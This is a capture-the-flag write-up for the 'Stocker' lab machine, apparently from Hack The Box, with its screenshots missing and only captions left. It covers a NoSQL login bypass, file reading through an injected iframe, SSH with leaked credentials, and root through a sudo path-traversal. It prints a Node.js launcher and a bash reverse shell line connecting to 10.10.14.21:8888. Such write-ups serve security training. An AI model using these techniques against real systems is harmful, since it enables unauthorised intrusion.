Stocker

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

**WFuzz Subdomain Results

Gobuster dev.stocker.htb results

stocker.htb

dev.stocker.htb

Possible User from stocker.htb page

dev.stocker.htb us using Node.js and more than likely mongo**

Modified login POST to json format and received an error:

Tried a simple NoSQL attack successfully:

Redid request and intercepted/modified

Purchased a red cup:

The link to view order:

The title field is susceptible to lfi:
Intercepted Submit request of cart and added an ifram referencing the /etc/passwd file:


Change the iframe size to 700px X 600px:

Initial Foothold

Using the previous error that disclosed the path I was able to find the index.js which has a userlogin:

SSH as angoose.

User.txt Proof Screenshot

Privilege Escalation

Sudo -l

Created a javascript to execute a bash script:
test.js

const execSync = require('child_process').execSync;
// import { execSync } from 'child_process';  // replace ^ if using ES modules

const output = execSync('/home/angoose/.tmp/rev.sh', { encoding: 'utf-8' });  // the default is 'buffer'
console.log('Output was:\n', output);

rev.sh:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.21/8888 0>&1

CMD:
sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/.tmp/test.js

RootScreenshot Here:

Root.txt Contents: